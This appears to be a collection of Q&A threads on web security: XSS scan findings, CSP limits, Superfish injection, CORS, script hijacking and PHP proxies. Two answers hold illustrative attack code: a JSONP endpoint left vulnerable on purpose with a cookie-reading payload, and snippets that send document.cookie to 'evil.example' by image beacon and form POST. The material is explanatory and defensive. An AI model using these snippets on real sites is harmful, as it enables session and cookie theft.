Could this have caused an XSS vulnerability? - javascript

I have had a scan performed on my website looking for vulnerabilities, etc. The report came back saying there was a risk of an XSS attack. I have looked into my website code, and the only issue I can find (which is causing a W3C validation error) is that I have accidentally added 'language="javascript"' to my script tag... could this have triggered the error they reported? I don't have any form inputs and the site is not connected to a database.
Many thanks in advance.

No, using language="javascript" on your script tags won't create an XSS vulnerability, even though it's bad practice. Unfortunately, I can't tell where your possible XSS vulnerability comes from without seeing any relevant code.

Any reputable consultant should make it clear in their report exactly what the risk is and how it is reproduced. I'd expect to see documented methodology, findings and conclusions.
If they can't demonstrate a risk then they can't say they have found one.
UPDATE:
Based on your comment I've found the following, which identifies this as a general vulnerability with the Apache webserver rather than your particular code. You should ask whoever manages your webhosting to comment.
A flaw in the handling of invalid Expect headers. If an attacker can influence the Expect header that a victim sends to a target site they could perform a cross-site scripting attack. It is known that some versions of Flash can set an arbitrary Expect header which can trigger this flaw. Not marked as a security issue for 2.0 or 2.2 as the cross-site scripting is only returned to the victim after the server times out a connection.
see:
http://www.rapid7.com/vulndb/lookup/http-apache-expect-header-xss
also:
http://www.iss.net/security_center/reference/vuln/HTTP_Apache_Expect_XSS.htm
UPDATE 2:
The following is a description of the vulnerability (link). Ask your hosting people to check their servers are properly patched.
In May 2006 a reporter found a bug in Apache where an invalid Expect header sent to the server (Apache 1.3.3 onwards) would be returned to the user in an error message, unescaped. This could allow a cross-site scripting attack only if a victim can be tricked into connecting to a site and sending such a carefully crafted Expect header. Whilst browsers do not provide this functionality, it was recently discovered that Flash allows you to make a connection with arbitrary headers. The attack mechanism is therefore:
The user is tricked into visiting a malicious web site with a Flash-enabled browser
The malicious web site uses a Flash movie to make a connection to the target site with a custom Expect header
This results in cross-site scripting (the attacker could steal your cookies from the third-party site, inject content, etc.)

If you're sure that no user input can ever make its way to be served on your pages, then there can't be any XSS.

XSS - Content Security Policy

Can XSS be prevented 100% by setting the content security policy as default-src 'self'? Is there any way XSS can happen in that case? One possibility I can think of is injecting user input into one of your scripts dynamically at the server side. Do you agree? Are there any other vulnerabilities you can think of?
No, CSP is not a magic bullet. It should be one line of defense, not the entire defense. If properly configured, it can help with:
preventing usable XSS, where the payload (whether persistent or reflected) must be small and would therefore usually just create a script element and inject external code
avoiding data extraction and misuse as a platform to attack other sites. Depending on how your application works, access to your backend service may suffice to extract data: for instance, if your users can write blog posts, an attacker could create a new post containing the data they want to extract, wait for a signal that the data has been grabbed (via a comment, for instance), and delete the post again, all without communicating with external servers.
To answer the question: yes, a modern browser with default-src 'self' can still execute user-controlled JavaScript, via JSONP.
Of particular note is our lack of self in our source list. While sourcing JavaScript from self seems relatively safe (and extremely common), it should be avoided when possible.
There are edge cases that any developer must concern themselves with when allowing self as a source for scripts. There may be a forgotten JSONP endpoint that doesn't sanitize the callback function name.
From http://githubengineering.com/githubs-csp-journey/
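To make the JSONP point concrete, here is a minimal sketch of the kind of forgotten endpoint the GitHub post warns about. The endpoint path, data and port are made up; the point is only that the response is served from your own origin, so script-src 'self' happily executes it even though the callback parameter is attacker-controlled.

// Hypothetical vulnerable JSONP endpoint (plain Node.js, illustrative only).
const http = require('http');

http.createServer((req, res) => {
  const url = new URL(req.url, 'http://localhost');
  if (url.pathname === '/api/user') {
    // BUG: the callback name is echoed verbatim, so it can carry arbitrary JavaScript.
    const cb = url.searchParams.get('callback') || 'cb';
    res.writeHead(200, { 'Content-Type': 'application/javascript' });
    res.end(cb + '(' + JSON.stringify({ name: 'alice' }) + ')');
  } else {
    res.writeHead(404);
    res.end();
  }
}).listen(3000);

// An injected tag such as
//   <script src="/api/user?callback=alert(document.cookie);//"></script>
// is same-origin, so default-src 'self' allows it, yet it runs attacker-chosen code.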
CSP should not be used as the only way to prevent XSS attacks. This mechanism works only client side (if you save malicious data into your DB, then you can probably start infecting other systems that you integrate with) and it's not implemented by all browsers (http://caniuse.com/#search=csp).
To prevent XSS you should always validate input data and encode output data. You can also print a warning message in the JavaScript console to discourage Self-XSS attacks (e.g. open a Facebook page and turn on Chrome Developer Tools; look at the message in the console).
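The console warning mentioned above is just a few lines of JavaScript; the wording below is only illustrative. It doesn't block anything, it simply discourages users who were told to paste code into the developer tools.

// Minimal Self-XSS warning printed to the developer console (illustrative wording).
if (typeof console !== 'undefined') {
  console.log('%cStop!', 'color: red; font-size: 40px; font-weight: bold;');
  console.log(
    'This console is intended for developers. If someone told you to paste ' +
    'something here, it is almost certainly a scam that will give them access ' +
    'to your account.'
  );
}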
Remember that the user input on the website is not the only source of XSS. Malicious data can also come from:
Importing data from files
Importing data from third party systems
Migrating data from an old system
Cookies and HTTP headers
If you have appropriate validation and encoding of data (server side), then you can additionally apply browser mechanisms such as CSP, X-XSS-Protection or X-Content-Type-Options to increase your confidence in your system's safety.
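As a sketch of what sending those headers can look like (a plain Node.js server here, with example policy values rather than a recommendation for any particular site):

// Illustrative only: emitting the browser-side defence headers mentioned above.
const http = require('http');

http.createServer((req, res) => {
  res.setHeader('Content-Security-Policy', "default-src 'self'");
  res.setHeader('X-XSS-Protection', '1; mode=block');   // legacy reflected-XSS filter hint
  res.setHeader('X-Content-Type-Options', 'nosniff');   // disable MIME-type sniffing
  res.end('Hello');
}).listen(8080);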

Requests to non-existing pages that all include "undefined"

Some odd requests have been appearing in our logs since ~October 20, 2014. They've increased to a few dozen a day, so while not a big problem, it's still interesting to find out the reason.
Earlier ones:
REQUEST[/en/undefinedsf_main.jsp?clientVersion=null&dlsource=null&CTID=null&userId=userIdFail&statsReporter=false] REFERER[http://colnect.com/en/coins]
REQUEST[/fr/undefined/GoogleExtension/deals.html?url=http://colnect.com&subid=STERKLY&appName=HypeNet&pos=2&frameId=buaovbluurbavptkwyaybzjrqweypsbavwrviv] REFERER[http://colnect.com/fr]
REQUEST[/br/stamps/undefined49507173c45043eba6dfb9da540e52de&chnl=slmbBRex&evt=DailyPing&prd=vbates&seg=1&ext=1&rnd=65983fb77b62e25cc2a8ef15af18273d] REFERER[http://colnect.com/br/stamps/countries]
Some current ones:
REQ[/ru/collectors/collector/undefined] REF[http://colnect.com/ru/collectors/collector/jokitsos]
REQ[/th/collectors/collector/undefined] REF[http://colnect.com/th/collectors/collector/VRABEC]
REQUEST[/en/account/undefined] REFERER[http://colnect.com/en/account/request_password]
REQUEST[/pt/stamps/undefined] REFERER[http://colnect.com/pt/stamps/years]
Some requests are by logged in members and some not.
I'd guess some JavaScript in their browser is trying to call a URL using an uninitialized variable, hence the "undefined".
Reasons may be similar to Odd requests to non-existing pages that all include "6_S3_" (perhaps malware), but I'm wondering if this might be a different reason.
I doubt it's a bug in our client-side JavaScript, as that would generate far more than a few dozen such requests a day from about a million daily page views.
Any ideas? Is it worth pursuing?
This is a big concern, but it's not coming from you.
These are JavaScript injection attacks (client-machine malware) using a self-signed root certificate.
Specifically, sf_main.html and deals.html have been linked to Superfish, which has been shipping on Lenovo machines recently. As Lenovo has been pushing its new lines of PCs, reports of the attacks have blown up recently.
These man-in-the-middle attacks start by hijacking the client's requests and then injecting HTML and JavaScript.
The reason there are so many undefined symbols is that Superfish, true to its name, is fishing for plugins, extensions, and libraries it can take advantage of, using their expected names, tokens, and paths. This is brute-force XSS.
Oh, no, what can I do??
Little. Not much.
As the requests are being hijacked on the client machine via HTTP request hijacking, you won't be able to tell the difference. You could try to "fish" for certain kinds of hostile "indicators", but then you are doing the work of anti-malware software.
Lenovo claims that
SuperFish has completely disabled server side interactions (since January) on all Lenovo products so that the software product is no longer active, effectively disabling SuperFish for all products in the market
While I trust the sincerity of China-based Lenovo, which has serious market interests in the Western world, I wouldn't trust the word of the China-based malware company Superfish.
These attacks are less of a problem for you than for your customers
Unless you work for a big bank or a popular social networking site, it's highly unlikely that malware like Superfish has targeted you specifically. Your customers' bank and social network accounts are at risk, but not because of anything you did or can do to stop it.
As always, the cure for client-side fishing attacks is good client-side protection.
Any ideas?
There seem to be two different options here:
There are mistakes in your code causing incorrect URLs to get generated
There are (search) bots trying to parse your Javascript and failing to do it correctly.
(A client side extension is stirring up trouble)
To differentiate between the two you would need to set up more specific logging. For example, adding the user agent to any log line containing the string undefined will answer this question. If it's your code causing the problem, you would also want to log the Referer header, as it will reveal on which page the faulty URLs are being generated.
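The question doesn't say what the server stack is, so purely as a sketch, targeted logging of this kind could look like the following Node.js-style handler (the log format is arbitrary):

// Log the user agent and referer only for request URLs containing "undefined".
function logUndefinedRequests(req, res, next) {
  if (req.url.includes('undefined')) {
    console.log(
      new Date().toISOString(),
      req.url,
      'UA:', req.headers['user-agent'] || '-',
      'Referer:', req.headers['referer'] || '-'
    );
  }
  next();
}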
Another way to identify the issue: if you have an analytics solution running on your site, such as Google Analytics, you can quite easily limit your report to only URLs containing undefined. If there are no such requests, you can conclude that it has to be a bot (as it wouldn't run the client-side analytics code); otherwise the report provides all the information needed to identify where the problem is caused.
Lastly, it might be a good idea to include a JavaScript error-logging solution (in its simplest form, a window.onerror handler with an AJAX request to /log.something). If your code is generating these undefined URLs, it's quite likely that some errors are being triggered as well.
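In its simplest form such an error logger is just a window.onerror handler; the /log.something path below is the placeholder used above, so substitute whatever endpoint your server actually exposes.

// Minimal client-side error logger (sketch).
window.onerror = function (message, source, line, column, error) {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', '/log.something', true);   // placeholder endpoint
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.send(JSON.stringify({
    message: message,
    source: source,
    line: line,
    column: column,
    stack: error && error.stack,              // error object is absent in very old browsers
    page: location.href
  }));
};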
Is it worth pursuing?
If users are actually being served invalid pages, then yes, this is definitely something to be investigated.

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with a list of acceptable CORS servers (abc.com, xyz.com, etc.)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list, and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (i.e. by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
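To illustrate that point: script already running in the page has never needed CORS (or XHR at all) to leak data; a simple GET beacon or a cross-origin form POST does it. The attacker domain below is obviously made up.

// Leak via an image beacon -- a plain GET request, no CORS involved.
new Image().src = 'https://evil.example/collect?c=' + encodeURIComponent(document.cookie);

// Leak via a cross-origin form POST -- also unaffected by CORS.
var f = document.createElement('form');
f.method = 'POST';
f.action = 'https://evil.example/collect';
var field = document.createElement('input');
field.type = 'hidden';
field.name = 'data';
field.value = document.cookie;
f.appendChild(field);
document.body.appendChild(f);
f.submit();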
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present on the page for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is not just where data can be sent, but also where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/image) stricter would be more secure, but it would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
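For example, a policy along the lines of the whitelist the question asks for could be sent like this (a Node.js sketch; the abc.com / xyz.com origins are the ones from the question and purely illustrative):

// Sketch: restrict which origins the page's scripts may contact.
const http = require('http');

http.createServer((req, res) => {
  res.setHeader(
    'Content-Security-Policy',
    "default-src 'self'; " +
    "script-src 'self'; " +                               // no inline or third-party script
    "connect-src 'self' https://abc.com https://xyz.com"  // XHR/fetch limited to these origins
  );
  res.end('<!doctype html><title>CSP demo</title>');
}).listen(8080);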
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain: if I'm using a browser at my company, and an AJAX script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution: CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the 'bobthehacker.com' accepted-origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the simple (non-preflighted) CORS case, the server will actually still return the results by default; you can configure it not to even do that. The results are then discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over which headers are accepted and rejected, so that requests from those sites conform to a certain shape.
Note: the Origin header and the OPTIONS preflight are controlled by the requester; obviously someone creating their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser WON'T do that. It is the browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
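As a sketch of the server-side half of that interaction (origins taken from the answer's example, Node.js used purely for illustration):

// The "gateway" acknowledges only trusted origins; the browser discards responses
// for anything else (e.g. bobthehacker.com), even though the request reached the server.
const http = require('http');

const allowedOrigins = new Set(['https://myinternaldomain.com']);

http.createServer((req, res) => {
  const origin = req.headers.origin;
  if (origin && allowedOrigins.has(origin)) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }
  res.setHeader('Content-Type', 'application/json');
  res.end(JSON.stringify({ ok: true }));
}).listen(8080);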
I share David's concerns.
Security must be built layer by layer, and a whitelist served by the origin server seems to be a good approach.
Plus, this whitelist can be used to close existing loopholes (forms, the script tag, etc.); it's safe to assume that a server serving the whitelist is designed to avoid backwards-compatibility issues.

how to prevent JS hijacking in public computers

This problem concerns a JS hijacking scenario, and here it is:
Say Mr. Good has a website called "iamtooinnocent.com" which loads an "x.js" file to perform some particular tasks, and Mr. Bad is an evil cyber cafe owner who has set up a redirect rule so that whenever any surfer using his cyber cafe visits Good's website, the request for the "x.js" file is simply redirected to some other evil domain which serves a different "x.js" file with evil code in it. This way Good's website will never know that it has received a different JS file from the one it requested.
I hope I have explained the scenario properly. My problem is: how can this be prevented? Is there really a way to prevent this? Can it be prevented by serving the JS file over HTTPS? I am not so sure. Can anybody give me a heads-up regarding this?
Thanks in advance.
HTTPS is the standard defence against man-in-the-middle attacks like the one you've described. It encrypts all traffic and authenticates your site with its certificate, so the content can't be changed in transit, and the certificate itself is verified by third-party certificate authorities.
But it can't guarantee 100% security, because it's possible to create a local fake certificate authority available only in the cafe.
If the computer owner is against you....you will have a hard time. The browser guarantees certain security rules, but the computer owner can modify it to his evil heart's content and you would be none the wiser...
Rule #1 in web security boils down to: NEVER trust the client.
Remember that clients can do just about anything with the data you are sending them, and the data they send YOU:
modify cookies for subsequent requests
alter or add/remove other HTTP headers, spoof User Agents
specify any combination of data in GET/POST
You should assume any data coming IN over HTTP to your application is a malicious, tainted, evil mess, and sanitize accordingly.
Is this the sort of cyber cafe where they provide the computers? If so, you just have to trust the owner, because you can't have security on somebody else's machine. If nothing else, they can install a hardware keylogger.
If this is the sort where they provide a wireless connection and you bring your laptop, HTTPS should be a safeguard. If your browser handles certificates and SSL properly, it should be possible to go to a site that has a verified certificate and be safe. If there are any problems in your browser, of course, the cyber cafe owner is in an ideal position to take advantage of them, so you might want to keep an eye on known vulnerabilities.
The best move is not to patronize cyber cafes run by evil owners, but that can be difficult in some parts of the world.

What are the disadvantages to using a PHP proxy to bypass the same-origin policy for XMLHttpRequest?

http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious, that you can use a proxy to get XML or JavaScript on another domain with XMLHttpRequest without running into same-origin restrictions. However, I do not hear about disadvantages over other methods -- are there, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
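The question is about a PHP proxy, but the locking-down advice is language-agnostic; here is the same idea sketched in Node.js, with the upstream URL hard-coded so callers cannot pick arbitrary targets (the URL is an example).

// Sketch: proxy exactly one known upstream resource, never a caller-supplied URL.
const http = require('http');
const https = require('https');

const UPSTREAM = 'https://feeds.example.com/data.xml';   // example upstream resource

http.createServer((req, res) => {
  if (req.url !== '/proxy') {                 // single fixed endpoint
    res.writeHead(404);
    return res.end();
  }
  https.get(UPSTREAM, (upstream) => {
    res.writeHead(upstream.statusCode, {
      'Content-Type': upstream.headers['content-type'] || 'application/octet-stream'
    });
    upstream.pipe(res);
  }).on('error', () => {
    res.writeHead(502);
    res.end('Upstream error');
  });
}).listen(8080);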
Overhead -- both for the user (who now has to wait for your server to request and receive data from the proxied source) and for you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model -- potentially allowing the user to be compromised -- so unless you absolutely trust the server you are communicating with (that means no random ads, no user defined content in the page[s] you are proxying) you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.
